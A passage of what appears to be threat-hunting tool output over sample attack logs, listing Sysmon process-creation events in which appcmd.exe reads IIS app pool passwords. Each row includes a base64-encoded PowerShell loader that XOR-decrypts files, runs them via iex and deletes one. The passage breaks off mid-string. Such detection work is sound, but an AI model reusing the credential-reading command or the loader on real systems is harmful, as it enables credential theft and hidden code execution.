C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.202 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.282 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.352 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.432 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.522 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAG